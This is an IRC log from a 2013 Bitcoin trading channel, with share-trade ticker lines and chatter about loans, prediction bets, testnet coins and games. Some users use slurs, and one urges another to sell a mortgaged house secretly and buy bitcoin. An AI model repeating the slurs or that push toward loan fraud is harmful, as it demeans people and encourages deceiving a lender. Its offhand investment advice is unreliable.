00:16:37 so it all boils down to just getting burnside to shed some light Sep 10 00:16:53 in most cases this would be wrong of him to do Sep 10 00:16:55 but Sep 10 00:17:04 labcoin did volunteer the limitation Sep 10 00:17:27 yep, he's the only one who could provide some useful information Sep 10 00:17:40 ThickAsThieves this is what in fiat would be resolved by calls for "Regulation" Sep 10 00:17:51 in bitcoin it's just resolved by death. Sep 10 00:18:10 [BTCTC] [DMS.MINING] 15 @ 0.002748 = 0.0412 BTC [+] Sep 10 00:18:11 contrary to what the fiat world believes, a much better solution all around. Sep 10 00:18:23 http://www.cnbc.com/id/101012270 Sep 10 00:18:27 The student loan bubble is starting to burst Sep 10 00:18:57 "We just don't see this as a market that we can significantly grow," Sep 10 00:18:59 hehe Sep 10 00:19:07 thank you we have enough soulds Sep 10 00:19:11 souls* Sep 10 00:19:16 hahaha Sep 10 00:19:23 lol Sep 10 00:19:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02359 BTC [-] Sep 10 00:19:34 no future in college loans for bankers Sep 10 00:19:42 "all kids are already bankrupt ty" Sep 10 00:19:53 "There is over $1 trillion in outstanding student loans, making it the second largest source of household debt after mortgages. " Sep 10 00:20:03 "household". Sep 10 00:20:09 "the stones are unable to bleed anymore, time to squeeze someone else" Sep 10 00:20:12 "The CFPB reported that around $8 billion of private student loans were in default." Sep 10 00:20:18 the only students i know keeping house are my slavegirls. Sep 10 00:20:21 wow $1 trillion is a lot of bitcoins! Sep 10 00:20:26 pankkake not for long. Sep 10 00:20:40 ssh Sep 10 00:20:43 stoppit Sep 10 00:20:46 you'll wake the monster Sep 10 00:20:59 thankfully I mostly have debts in fiat Sep 10 00:21:04 can't wait for inflation! Sep 10 00:21:08 srsly Sep 10 00:21:12 maybe I should borrow more? :p Sep 10 00:21:16 srsly. Sep 10 00:21:18 yeah Sep 10 00:21:22 borrow fiat, buy btc. Sep 10 00:21:30 I'm a borrow as much as you can person myself Sep 10 00:21:30 classic denomination play Sep 10 00:21:31 fuck em Sep 10 00:21:33 you and everyone else. sometimes i think im the only debt free sucker in the world. Sep 10 00:21:57 mircea_popescu: how did you come to be independently wealthy? Sep 10 00:22:15 probably talent and luck Sep 10 00:22:20 mircea_popescu is a strong independent black woman who dont need no man Sep 10 00:22:20 isn't that how it always is? Sep 10 00:22:33 ha Sep 10 00:22:36 hard work never plays into it Sep 10 00:22:44 I was actually thinking that, scamming my bank: I'm repaying a home, but I could sell it (especially since it's likely the top of the housing bubble), not tell my bank, buy bitcoins with the money Sep 10 00:22:54 pankkake: do it. Sep 10 00:23:00 I'm not that kind of guy Sep 10 00:23:00 i thought independently wealthy peeps were born into luxury Sep 10 00:23:11 lol Sep 10 00:23:14 pet mini giraffe and everything Sep 10 00:23:14 the home buying is mostly to please my parents anyway Sep 10 00:23:41 Duffer1 don't forget being in the right place at the right time Sep 10 00:24:00 but srsly mircea_popescu how'dja do it? Sep 10 00:24:11 pankkake this is actually the main threat bitcoin poses to the banking system Sep 10 00:24:18 it can be summed up by "showing up" Sep 10 00:24:22 once the people start doing this in droves it'll be the fucking end of things. Sep 10 00:24:27 as there's literally no recourse. Sep 10 00:24:35 just denominate loans in btc Sep 10 00:24:55 [HAVELOCK] [LABCO] 135 @ 0.00330001 = 0.4455 BTC [-] Sep 10 00:24:59 and watch all your borrowers default. Sep 10 00:25:01 hrm. Sep 10 00:25:02 [HAVELOCK] [LABCO] 1500 @ 0.00330001 = 4.95 BTC [-] Sep 10 00:25:10 bitcoin-only denominated loans are a tricky enterprise Sep 10 00:25:15 likely not to be repaid Sep 10 00:25:18 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Sep 10 00:25:22 benkay_ basically by being an unrelenting asshole, knowing more than anyone else in whatever field and people having enough sense to hire me rather than run themselves into the wall. Sep 10 00:25:41 [BTCTC] [LABCOIN] 2400 @ 0.0035 = 8.4 BTC [-] Sep 10 00:25:43 [BTCTC] [LABCOIN] 699 @ 0.003411 = 2.3843 BTC [-] Sep 10 00:25:44 [BTCTC] [LABCOIN] 11 @ 0.00341 = 0.0375 BTC [-] Sep 10 00:25:45 [BTCTC] [LABCOIN] 1300 @ 0.00341 = 4.433 BTC [-] Sep 10 00:25:46 [BTCTC] [LABCOIN] 50 @ 0.003408 = 0.1704 BTC [-] Sep 10 00:25:47 MP: "knowing more than anyone else in whatever field" Sep 10 00:25:48 [BTCTC] [LABCOIN] 2136 @ 0.003408 = 7.2795 BTC [-] Sep 10 00:25:48 mircea_popescu: how does being an unrelenting asshole turn into a performance edge? Sep 10 00:25:49 [BTCTC] [LABCOIN] 100 @ 0.003407 = 0.3407 BTC [-] Sep 10 00:25:50 [BTCTC] [LABCOIN] 1304 @ 0.003405 = 4.4401 BTC [-] Sep 10 00:26:00 benkay_ because people know they can rely on you. Sep 10 00:26:10 believe it or not, bullshit is the largest cost to doing business. Sep 10 00:26:18 mircea_popescu: i think you just said that you are > Sep 10 00:26:27 i'm checking google translate Sep 10 00:26:55 mircea_popescu: "look i don't fucking need you" attitude translates into "o damn that guy has dat competence" in the audience mind? Sep 10 00:27:12 ^ if you deliver Sep 10 00:27:21 not really. do you know the joke with "by the way your wife died" ? Sep 10 00:27:28 no. Sep 10 00:27:49 sir john has to go to pas de calais on business. leaves butler clear isntructions to call if anything goes wrong. Sep 10 00:27:56 halfway through trip calls home, asks butler how things are Sep 10 00:28:03 this guy's gifs are awesome https://bitcointalk.org/index.php?topic=263445.msg3117074#msg3117074 Sep 10 00:28:04 "oh, everything's fine sir. just fine. Sep 10 00:28:06 sfw Sep 10 00:28:15 except we had to put the old horse down." Sep 10 00:28:18 "oh ? how come ?" Sep 10 00:28:27 "well, he broke his leg running away from the stable" Sep 10 00:28:34 "why was it running away ?" Sep 10 00:28:39 "why to get away from the fire sir" Sep 10 00:28:41 "what fire ?" Sep 10 00:29:01 "unfortunately some stray sparks went from the roof of the house to the barn and it caught on fire" Sep 10 00:29:06 "why was the house on fire ?" Sep 10 00:29:38 "because when lord Neigbour paid his respects to your late wife he fainted and fell over the candles overturning them" Sep 10 00:29:57 (you laugh here) Sep 10 00:30:04 this joke takes too long. the neighbor is fucking the wife Sep 10 00:30:28 right. so i guess you see the value in "you fucking idiot, your neighbour is fucking your wife to death and the house burned down" Sep 10 00:30:28 baha Sep 10 00:30:49 [BTCTC] [COGNITIVE] 2 @ 0.289 = 0.578 BTC [-] Sep 10 00:30:49 [BTCTC] [COGNITIVE] 1 @ 0.2886 BTC [-] Sep 10 00:31:19 hm. seems like you have to get in bed with people who are mismanaging their businesses and straighten their shit out. Sep 10 00:31:32 kinda what i 've been doing for the past 10-15 years. Sep 10 00:31:48 am i going about this bass-ackwards in looking for people with functional businesses and abstracting the parts they don't want to deal with and making myself utterly indispensable? Sep 10 00:32:01 well Sep 10 00:32:07 painful to be gotten rid of Sep 10 00:32:17 i don't think i'm much of a role model. my shit works for me, but it has major requirements that are unlikely to feel comfortable to others. Sep 10 00:32:21 "This is the reason why I will never sell my shares, ActM for life." Sep 10 00:32:26 I just don't understand Sep 10 00:32:30 pankkake good plan :D Sep 10 00:32:34 a harem? Sep 10 00:32:36 for lief!!! BFF! Sep 10 00:32:44 wtb harem pst Sep 10 00:32:44 Duffer1 that's unrelated. Sep 10 00:32:57 hehe Sep 10 00:33:27 also unrelated the part where im mostly frugal, and have been making more than i can spend for years, and thus i have/had all sorts of partnerships etc. Sep 10 00:33:52 mr. popescu Sep 10 00:33:59 You scammed me! Sep 10 00:34:05 o ya ? Sep 10 00:34:15 3 units! Sep 10 00:34:38 You told me playing Eve would get me laid. Total scam. Sep 10 00:34:46 not even a single unit Sep 10 00:34:48 you're playing eve ? Sep 10 00:34:57 ya Sep 10 00:35:00 picking it back up slowly Sep 10 00:35:00 i got laid playing eve thestringpuller Sep 10 00:35:04 to get laid? Sep 10 00:35:12 play harder Sep 10 00:35:14 I thought only WoW had girls Sep 10 00:35:16 lol jcpham has it Sep 10 00:35:26 mircea_popescu: http://vimeo.com/7670880 Sep 10 00:35:29 anyway, i'll tell you the real scam. i just inserted into my tortured eve brain an implant Sep 10 00:35:39 which makes my SHIP generate 1% more power. Sep 10 00:35:44 to the tune of about 70MW! Sep 10 00:35:53 so i guess my avatar has a powerplug in its butt now Sep 10 00:36:09 mircea_popescu has hacked his brain like the dolphin in that movie Sep 10 00:36:35 johny mnumonic or however the fck you spell it Sep 10 00:36:43 yeah that's the one Sep 10 00:36:49 wtf was that dolphin's name Sep 10 00:37:01 johny menmonic should date jane pneumatic. Sep 10 00:37:14 jones Sep 10 00:37:31 http://vimeo.com/7125141 this is what mp does. he's a pastor for homeless. Sep 10 00:37:35 Mircea Popescu - Sesiune training Birda, Timis on Vimeo Sep 10 00:38:13 [BTCTC] [ACTIVEMINING] 8 @ 0.003497 = 0.028 BTC [+] Sep 10 00:38:40 lol Sep 10 00:38:49 mircea_popescu playing EVE: http://www.youtube.com/watch?v=SoxGazX_kkw Sep 10 00:38:52 that was actually for teh local party, on the electoral trail. Sep 10 00:39:28 and those are upstanding romanian citizens of teh rural medium, not homeless! Sep 10 00:39:40 upstanding romanian citizens Sep 10 00:39:46 hehe :D Sep 10 00:39:47 i lol'd Sep 10 00:40:11 well they eat better than the average american at any rate. Sep 10 00:40:14 course they wash a lot less. Sep 10 00:40:26 average american isn't really a good basis for comparison with anything Sep 10 00:40:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02355 = 0.0471 BTC [-] Sep 10 00:40:55 they generally sit around calling each other "faggot" all day, eating processed cheese and dreaming about competing on The Apprentice Sep 10 00:41:24 you can still call people faggot in america ?! Sep 10 00:41:25 don't forget the high fructose corn syrup IV Sep 10 00:41:36 drive-in fast food is a sign of ultimate decadence Sep 10 00:41:48 because participation in reality television shows pretending to be capitalists trumps actual participation in the market Sep 10 00:41:55 oh yeah Sep 10 00:42:01 but there are criteria Sep 10 00:42:06 you have to be in the underclass Sep 10 00:42:19 wealthy enough to buy your privacy Sep 10 00:42:44 or willing to endure the scorn of the internet Sep 10 00:43:13 people who can't drop the f-bomb: Sep 10 00:43:15 teachers Sep 10 00:43:15 well you can always backtrace the internet. Sep 10 00:43:17 politicians Sep 10 00:43:29 software developers Sep 10 00:43:41 is the f bomb "fuck you and your ugly mother in the same stroke" ? Sep 10 00:43:54 faggot, sir. Sep 10 00:44:04 although Sep 10 00:44:14 there we go Sep 10 00:45:00 what do you mean by "you can always backtrace the internet"? Sep 10 00:45:36 http://buttcoin.org/reddit-thinks-children-introduced-gambling-valuable-bitcoin-teaching-tool Sep 10 00:46:32 sir_faggot it's a reference to an old video Sep 10 00:46:36 [BTCTC] [LABCOIN] 10 @ 0.003622 = 0.0362 BTC [+] Sep 10 00:46:41 ;;google "i've backtraced it" Sep 10 00:46:41 Urban Dictionary: Back-Traced It: ; (EXTENDED REMIX) Because I Back-Traced It (You dun goofed up ...: ; Because I Back-Traced It! (You dun goofed up) REMIX - YouTube: Sep 10 00:46:50 ThickAsThieves: i love the surgeon general's warning on that poster Sep 10 00:50:25 consequences will never be the same, mircea_popescu. Sep 10 00:50:31 for your unit Sep 10 00:51:46 [BTCTC] [LABCOIN] 100 @ 0.003622 = 0.3622 BTC [+] Sep 10 00:51:47 [BTCTC] [LABCOIN] 100 @ 0.003623 = 0.3623 BTC [+] Sep 10 00:51:48 [BTCTC] [LABCOIN] 225 @ 0.003625 = 0.8156 BTC [+] Sep 10 00:51:50 [BTCTC] [LABCOIN] 1868 @ 0.003625 = 6.7715 BTC [+] Sep 10 00:53:01 http://bitbet.us/bet/528/activemining-will-be-profitable-for-most-investors/ << here's a bold proposition. Sep 10 00:53:06 BitBet - ActiveMining will be profitable for most investors Sep 10 00:54:11 [BTCTC] [LABCOIN] 25 @ 0.003625 = 0.0906 BTC [+] Sep 10 00:54:14 ThickAsThieves aww, it kinda sucks that the sa crew is stuck arguing against bitcoin on the basis of look what reddit said. Sep 10 00:54:34 i mean i get it, graham is dumb, his creations reek of stupid, sure. why fight strawmen for a living tho. Sep 10 00:54:41 ah, what do you guys think of this bet? :) Sep 10 00:54:48 [BTCTC] [LABCOIN] 2 @ 0.003625 = 0.0073 BTC [+] Sep 10 00:55:04 pankkake i think ima put some btc on the no side myself. Sep 10 00:55:39 [BTCTC] [DMS.MINING] 3 @ 0.002749 = 0.0082 BTC [+] Sep 10 00:55:43 the addendum about btct.co is good but forgets it is also traded on bitfunder, shares could end up there Sep 10 00:55:43 mining company Sep 10 00:55:46 scam Sep 10 00:56:23 well the bet is strictly about btct from what i see Sep 10 00:56:26 since the link is there etc. Sep 10 00:56:28 who created the Yes bet? the site? Sep 10 00:56:29 [BTCTC] [LABCOIN] 10 @ 0.003625 = 0.0363 BTC [+] Sep 10 00:56:31 it's going to 1BASZ too (which is me) Sep 10 00:56:55 pankkake yes. when a bet is accepted the site splits 0.1 btc or more on yes/no Sep 10 00:56:58 mircea_popescu: well duh Sep 10 00:57:00 and sets the lowest to bet creator. Sep 10 00:57:16 mircea_popescu: can u close labcoin bt Sep 10 00:57:31 the first bet is all me though, I paid for it Sep 10 00:57:33 funny Sep 10 00:57:44 [BTCTC] [LABCOIN] 1 @ 0.003625 BTC [+] Sep 10 00:57:50 khalunis which one ? Sep 10 00:58:26 one where it said they'll send out chips Sep 10 00:58:59 seems it's closed alreayd. Sep 10 00:59:00 Resolution: Sep 10 00:59:00 in 2 days 2 hours (12-09-2013) Sep 10 00:59:21 oh yeah Sep 10 00:59:23 ok thx Sep 10 00:59:51 [MPEX] [S.MPOE] 5153 @ 0.00089693 = 4.6219 BTC [+] Sep 10 00:59:56 [MPEX] [S.MPOE] 2980 @ 0.00089929 = 2.6799 BTC [+] Sep 10 01:00:04 [MPEX] [S.MPOE] 19417 @ 0.00089953 = 17.4662 BTC [+] Sep 10 01:02:11 [BTCTC] [KENILWORTH] 1 @ 0.001788 BTC [+] Sep 10 01:03:53 pankkake so basically as it stands right now you win on that bet no matter what lol Sep 10 01:03:55 [BTCTC] [LABCOIN] 25 @ 0.003623 = 0.0906 BTC [-] Sep 10 01:04:34 well, making that bet was some work! Sep 10 01:05:41 [HAVELOCK] [AM100] 16 @ 0.023195 = 0.3711 BTC [+] Sep 10 01:05:59 [HAVELOCK] [AM100] 7 @ 0.02319588 = 0.1624 BTC [+] Sep 10 01:06:08 [HAVELOCK] [AM100] 1 @ 0.02319588 BTC [+] Sep 10 01:06:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02348 = 0.047 BTC [-] Sep 10 01:07:24 that eBay bet was too short, no one is going to bet Yes Sep 10 01:08:09 I wish there was a calculator for the lazies like me Sep 10 01:08:50 hm Sep 10 01:09:25 [BTCTC] [DMS.SELLING] 2 @ 0.009552 = 0.0191 BTC [+] Sep 10 01:09:26 [BTCTC] [DMS.SELLING] 8 @ 0.009552 = 0.0764 BTC [+] Sep 10 01:10:22 [BTCTC] [LABCOIN] 4 @ 0.003623 = 0.0145 BTC [-] Sep 10 01:10:52 this is a good one http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 10 01:11:22 who put 15 on yes Sep 10 01:11:27 don't mention model names, ThickAsThieves Sep 10 01:11:31 you'll probably get another Fractal Sep 10 01:11:40 ;) Sep 10 01:12:03 it does not say unit at least :) Sep 10 01:12:07 i had to put him on ignore Sep 10 01:12:25 khalunis either kennyboy or else someone who sold out or didn't buy in but wants some actyion Sep 10 01:13:08 and who is kenny boy? Sep 10 01:13:26 "That'd be the first time someone is burned by betting against a Bitcoin miner delivery." well… Sep 10 01:13:28 is there a thread knc hangs out in? Sep 10 01:13:34 isnt knc ken slaughter's thing ? Sep 10 01:13:37 no Sep 10 01:13:40 thats amc Sep 10 01:13:43 o o sorry. Sep 10 01:13:45 and vnc Sep 10 01:13:46 [BTCTC] [DMS.MINING] 1 @ 0.002749 BTC [+] Sep 10 01:13:47 and actm Sep 10 01:13:56 yes yes. i got my *mcs mixed up Sep 10 01:14:02 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00062 = 0.0124 BTC [+] Sep 10 01:14:04 [BTCTC] [KENILWORTH] 1 @ 0.0017 BTC [-] Sep 10 01:15:01 [BTCTC] [LABCOIN] 4 @ 0.003623 = 0.0145 BTC [-] Sep 10 01:15:25 by the way, do you still have the creepy slaughter pictures? it was like "now that vbs is gone .... *post*" Sep 10 01:16:19 i have one i think Sep 10 01:17:34 i only have this one, sry http://imgur.com/WrLi7Hd Sep 10 01:17:54 lol it's pretty creepy Sep 10 01:17:59 what became of angryoldguy anyway ? Sep 10 01:18:22 probly changed his handle Sep 10 01:18:32 or maybe actuallu got busy making things Sep 10 01:18:39 haha yea, that's one of them Sep 10 01:18:45 yea, like a dynamite loaded baseball bat. Sep 10 01:19:49 dexX7: I have been trying to find the pictures again, no luck Sep 10 01:20:01 didn't want to ask on the forum, I am considered a troll enough Sep 10 01:20:10 they are in the logs Sep 10 01:20:14 but i don't know which date Sep 10 01:20:38 [HAVELOCK] [LABCO] 25 @ 0.003599 = 0.09 BTC [+] Sep 10 01:20:59 [BTCTC] [LABCOIN] 2 @ 0.003623 = 0.0072 BTC [-] Sep 10 01:21:16 [BTCTC] [LABCOIN] 192 @ 0.003623 = 0.6956 BTC [-] Sep 10 01:21:21 there was some pictures of their offices too Sep 10 01:21:26 oooh found it https://secure.flickr.com/photos/98907028@N08/ Sep 10 01:22:12 that's pretty cool (well except I wonder how it will be kept cool) Sep 10 01:22:19 all those chenbros, stood up by avalons Sep 10 01:22:22 those are the originals Sep 10 01:23:54 seems everyone missed this today https://bitcointalk.org/index.php?topic=291112.msg3114827#msg3114827 Sep 10 01:24:09 I wonder why he bought the Thermaltake power supply Sep 10 01:24:11 they're ugly Sep 10 01:24:12 .12btc for USB miners Sep 10 01:24:16 and not that cheap too Sep 10 01:24:20 cool Sep 10 01:25:19 ThickAsThieves i think people kinda stopped caring about usb miners by now. Sep 10 01:25:39 [BTCTC] [LABCOIN] 100 @ 0.003555 = 0.3555 BTC [-] Sep 10 01:26:03 possibly Sep 10 01:26:12 [BTCTC] [LABCOIN] 100 @ 0.003554 = 0.3554 BTC [-] Sep 10 01:26:14 [BTCTC] [LABCOIN] 100 @ 0.003555 = 0.3555 BTC [+] Sep 10 01:26:18 sorta like the vw beetle Sep 10 01:26:24 no there was a very active discussion on collecting all the colors Sep 10 01:26:32 some are rarer Sep 10 01:26:35 a great piece of engineering, but not a novelty, not the fastest/biggest/powerfulest car Sep 10 01:26:37 so ppl move on Sep 10 01:26:38 $15 is a decent price to use them as gifts/learning tools Sep 10 01:26:44 [BTCTC] [LABCOIN] 300 @ 0.003622 = 1.0866 BTC [+] Sep 10 01:27:16 [BTCTC] [ACTIVEMINING] 10 @ 0.003493 = 0.0349 BTC [-] Sep 10 01:27:22 mine on testnet? :) Sep 10 01:27:26 http://rigsomelight.com/2013/09/09/frameless-geodesic-dome.html Sep 10 01:27:28 Frameless Geodesic Dome Sep 10 01:27:33 I wonder if testnet bitcoins will be worth something one day Sep 10 01:27:35 [BTCTC] [LABCOIN] 100 @ 0.003623 = 0.3623 BTC [+] Sep 10 01:27:36 pankkake totally great way to troll the devs lol Sep 10 01:28:24 why? Sep 10 01:28:25 [BTCTC] [CB.IDIFF-O] 30 @ 0.0099 = 0.297 BTC [+] Sep 10 01:28:26 [BTCTC] [ACTIVEMINING] 10 @ 0.003493 = 0.0349 BTC [-] Sep 10 01:28:27 [BTCTC] [LABCOIN] 110 @ 0.003623 = 0.3985 BTC [+] Sep 10 01:28:47 "If you try to drain the Faucet dry, you won't be doing anyone a favour and you will only piss off the core developers. If you try to sell the coins, the devs will just reset the TestNet and you will lose everything." Sep 10 01:28:50 well wait until someone's trying to test anything to do with mining and zip him lol Sep 10 01:29:32 [BTCTC] [ACTIVEMINING] 5 @ 0.003494 = 0.0175 BTC [+] Sep 10 01:29:53 consider the case right after the spring fork Sep 10 01:30:04 someone mining a lot on testnet would have actually caused some measurable delays Sep 10 01:30:49 [BTCTC] [DMS.MINING] 13 @ 0.002626 = 0.0341 BTC [-] Sep 10 01:31:24 [BTCTC] [BASIC-MINING] 15 @ 0.1299 = 1.9485 BTC [+] Sep 10 01:31:26 [BTCTC] [DMS.MINING] 38 @ 0.002749 = 0.1045 BTC [+] Sep 10 01:31:37 why not create a private testnet? actually I don't understand why there has to be a testnet, and not multiple privatenets Sep 10 01:32:08 [BTCTC] [DMS.MINING] 649 @ 0.00275 = 1.7848 BTC [+] Sep 10 01:32:12 im sure there's private testnets by now. Sep 10 01:32:20 [BTCTC] [LABCOIN] 3455 @ 0.003623 = 12.5175 BTC [+] Sep 10 01:32:21 [BTCTC] [LABCOIN] 1300 @ 0.003624 = 4.7112 BTC [+] Sep 10 01:32:22 [BTCTC] [LABCOIN] 2000 @ 0.003625 = 7.25 BTC [+] Sep 10 01:32:24 [BTCTC] [LABCOIN] 289 @ 0.003626 = 1.0479 BTC [+] Sep 10 01:32:25 [BTCTC] [LABCOIN] 42 @ 0.003626 = 0.1523 BTC [+] Sep 10 01:32:26 [BTCTC] [LABCOIN] 100 @ 0.003627 = 0.3627 BTC [+] Sep 10 01:32:27 [BTCTC] [LABCOIN] 19 @ 0.003629 = 0.069 BTC [+] Sep 10 01:32:28 [BTCTC] [LABCOIN] 30 @ 0.003633 = 0.109 BTC [+] Sep 10 01:32:29 [BTCTC] [LABCOIN] 365 @ 0.003651 = 1.3326 BTC [+] Sep 10 01:32:29 the original testnet was a pr exercise on satoshi's part, whether he realised it or not. Sep 10 01:32:58 [BTCTC] [DMS.MINING] 40 @ 0.00279 = 0.1116 BTC [+] Sep 10 01:33:10 [BTCTC] [LABCOIN] 50 @ 0.003651 = 0.1826 BTC [+] Sep 10 01:33:21 [MPEX] [S.MPOE] 6433 @ 0.00089821 = 5.7782 BTC [-] Sep 10 01:33:23 [MPEX] [S.MPOE] 3217 @ 0.00089646 = 2.8839 BTC [-] Sep 10 01:33:40 [BTCTC] [ACTIVEMINING] 5 @ 0.003493 = 0.0175 BTC [-] Sep 10 01:33:49 https://bitcointalk.org/index.php?topic=254930.msg3117569#msg3117569 omg Sep 10 01:33:53 [BTCTC] [DMS.MINING] 21 @ 0.002526 = 0.053 BTC [-] Sep 10 01:33:54 ActiveMining Overview and Speculation Thread Sep 10 01:33:55 [BTCTC] [DMS.MINING] 10 @ 0.002525 = 0.0253 BTC [-] Sep 10 01:33:56 [BTCTC] [DMS.MINING] 1 @ 0.002524 BTC [-] Sep 10 01:33:57 [BTCTC] [DMS.MINING] 26 @ 0.002518 = 0.0655 BTC [-] Sep 10 01:33:58 [BTCTC] [DMS.MINING] 242 @ 0.002511 = 0.6077 BTC [-] Sep 10 01:34:26 [BTCTC] [LABCOIN] 100 @ 0.003651 = 0.3651 BTC [+] Sep 10 01:34:29 [BTCTC] [ACTIVEMINING] 5 @ 0.003494 = 0.0175 BTC [+] Sep 10 01:34:40 crumbs ?! lol. Sep 10 01:35:13 "Just look and you will see the pattern..." Sep 10 01:35:26 i am beginning to like these people with the "just look and you'll see" thing. Sep 10 01:35:31 [BTCTC] [LABCOIN] 10 @ 0.003651 = 0.0365 BTC [+] Sep 10 01:35:35 [BTCTC] [ACTIVEMINING] 100 @ 0.003567 = 0.3567 BTC [+] Sep 10 01:35:56 [BTCTC] [ACTIVEMINING] 100 @ 0.003566 = 0.3566 BTC [-] Sep 10 01:36:11 [BTCTC] [LABCOIN] 30 @ 0.003651 = 0.1095 BTC [+] Sep 10 01:36:13 !t btct asicminer Sep 10 01:36:15 Are you sure you have no tobacco? Sep 10 01:36:20 !t btctc asicminer Sep 10 01:36:22 The eagle never lost so much time as when he submitted to learn from the crow. Sep 10 01:36:30 !t btctc activemining Sep 10 01:36:32 [BTCT:ACTIVEMINING] 1D: 0.003106 / 0.00335 / 0.003583 (84865 shares, 283.9 BTC), 7D: 0.00301 / 0.00448 / 0.006998 (543756 shares, 2435 BTC), 30D: 0.002971 / 0.00465 / 0.006998 (1684764 shares, 7837.4 BTC) Sep 10 01:36:36 ty sheehs. Sep 10 01:36:49 there should be a regexp like b[tc]{2,10} Sep 10 01:37:02 I just write it btctttctctt Sep 10 01:37:07 lol Sep 10 01:37:36 !t btct asicminer-pt Sep 10 01:37:37 [BTCT:ASICMINER-PT] 1D: 2.42 / 2.4935 / 2.55 (314 shares, 783 BTC), 7D: 1.927 / 2.28512 / 2.609 (2580 shares, 5895.6 BTC), 30D: 1.927 / 2.89067 / 4.299 (14939 shares, 43183.7 BTC) Sep 10 01:38:03 i thought it was like 5 at some point Sep 10 01:38:07 guess more than a month ago by now Sep 10 01:38:29 it was Sep 10 01:38:29 [BTCTC] [LABCOIN] 599 @ 0.003651 = 2.1869 BTC [+] Sep 10 01:38:30 [BTCTC] [LABCOIN] 717 @ 0.00367 = 2.6314 BTC [+] Sep 10 01:38:37 [MPEX] [S.MPOE] 7853 @ 0.00089646 = 7.0399 BTC [-] Sep 10 01:38:38 [MPEX] [S.MPOE] 5097 @ 0.00089367 = 4.555 BTC [-] Sep 10 01:38:46 mostly around 4 Sep 10 01:39:47 [BTCTC] [LABCOIN] 2000 @ 0.003623 = 7.246 BTC [-] Sep 10 01:40:09 pankkake how much to troll https://bitcointalk.org/index.php?topic=291274.new#new ? Sep 10 01:40:54 just use ?ref=1Eck6cgGzEb9N42CFhcsCBQhZQStoJbHRK and I'll do it for free :p Sep 10 01:41:49 the fun thing is that I initially worded the bet the other way around Sep 10 01:42:02 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 10 01:42:06 i can pay as much as 4 lols Sep 10 01:42:13 ah nice Bargraphics added his 0.5 Sep 10 01:42:36 how would you know it's him ? Sep 10 01:42:48 he said he was going to add 0.5 Sep 10 01:42:50 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 10 01:43:16 and I announced only in a thread he was following Sep 10 01:43:32 ic Sep 10 01:43:39 he is a major shareholder Sep 10 01:43:54 500 btc worth or so Sep 10 01:44:05 well, in his position I would bet No Sep 10 01:44:09 right. Sep 10 01:44:21 i think ppl do not understand hedging too well. Sep 10 01:45:51 and there's the "happiness" factor. I don't really want to bet if the outcome makes me happy but I'm not sure enough Sep 10 01:46:31 how';s that ? Sep 10 01:47:08 [BTCTC] [ACTIVEMINING] 400 @ 0.003542 = 1.4168 BTC [-] Sep 10 01:47:13 for example if I bet my favorite sports team wins because I'm pretty sure they will Sep 10 01:47:25 I don't really care about the winnings (unless the sums are huge maybe) Sep 10 01:47:34 a, like a social thing Sep 10 01:47:35 yea Sep 10 01:48:34 I met a sport gambler who told me he was making a lot of money betting against teams with a lot of fans Sep 10 01:48:46 hehe i bet that works. Sep 10 01:48:58 [BTCTC] [LABCOIN] 70 @ 0.00367 = 0.2569 BTC [+] Sep 10 01:49:57 [BTCTC] [LABCOIN] 3213 @ 0.00367 = 11.7917 BTC [+] Sep 10 01:50:07 "you won't see another bet from me on that website as I just found out who runs it" Sep 10 01:50:53 well somebody must have bet cause it's like 4 on no now Sep 10 01:51:19 well the No's are going to be numerous Sep 10 01:51:25 it's the Yes that are needed Sep 10 01:51:30 they're all in the forums very active Sep 10 01:51:38 and the yes are going to be absent because of "who runs it" lawl. Sep 10 01:51:46 stupid investor is stupid [and does not hedge] Sep 10 01:51:53 but when bets are involved, things are going to be different, I guess Sep 10 01:52:06 I'm trying to find a study on that, but can't Sep 10 01:52:19 bitcoin is THE study in that. Sep 10 01:52:37 people respond more honestly to questions if they lose something when wrong Sep 10 01:53:08 yes but people also avoid questions where they lose something when wrong Sep 10 01:53:14 because they are mean questions! Sep 10 01:53:15 [BTCTC] [BASIC-MINING] 1 @ 0.1299 BTC [+] Sep 10 01:53:19 and also bad for pr! Sep 10 01:53:31 [BTCTC] [LABCOIN] 200 @ 0.003699 = 0.7398 BTC [+] Sep 10 01:53:31 "I've heard about some irregularities with DeaDTerra's transfer of Activemining shares to Ukyo, and I was wondering if you are still processing transfers of Activemining.PT shares to Havelock right now" Sep 10 01:53:32 sigh Sep 10 01:53:34 questions should reward incompetence because that's how school works! Sep 10 01:54:02 [BTCTC] [LABCOIN] 2000 @ 0.003699 = 7.398 BTC [+] Sep 10 01:54:07 ThickAsThieves does he mean the time deadterra was in vacation or what. Sep 10 01:54:16 i cant be sure wtf Sep 10 01:54:19 [BTCTC] [LABCOIN] 70 @ 0.00367 = 0.2569 BTC [-] Sep 10 01:54:40 ACTIVEmining he says Sep 10 01:54:44 and then .PT Sep 10 01:54:44 oooh Sep 10 01:54:49 I didn't catch that Sep 10 01:54:54 wheras DT ran G.ASIC Sep 10 01:55:10 I guess the A(ct)M thing really does work Sep 10 01:55:23 [BTCTC] [LABCOIN] 208 @ 0.00367 = 0.7634 BTC [-] Sep 10 01:55:38 seems so. Sep 10 01:56:33 [BTCTC] [LABCOIN] 1500 @ 0.003699 = 5.5485 BTC [+] Sep 10 01:57:04 [MPEX] [S.MPOE] 194 @ 0.00089367 = 0.1734 BTC [-] Sep 10 01:57:06 [BTCTC] [ACTIVEMINING] 12 @ 0.003525 = 0.0423 BTC [-] Sep 10 01:57:58 [BTCTC] [LABCOIN] 200 @ 0.003699 = 0.7398 BTC [+] Sep 10 02:01:38 [BTCTC] [LABCOIN] 3 @ 0.003699 = 0.0111 BTC [+] Sep 10 02:01:39 [BTCTC] [LABCOIN] 5 @ 0.003699 = 0.0185 BTC [+] Sep 10 02:01:41 [BTCTC] [LABCOIN] 5000 @ 0.00375 = 18.75 BTC [+] Sep 10 02:06:36 [HAVELOCK] [LABCO] 65 @ 0.003599 = 0.2339 BTC [+] Sep 10 02:09:18 [BTCTC] [LABCOIN] 500 @ 0.00375 = 1.875 BTC [+] Sep 10 02:10:11 labcoin to the moon!11eleven! Sep 10 02:11:27 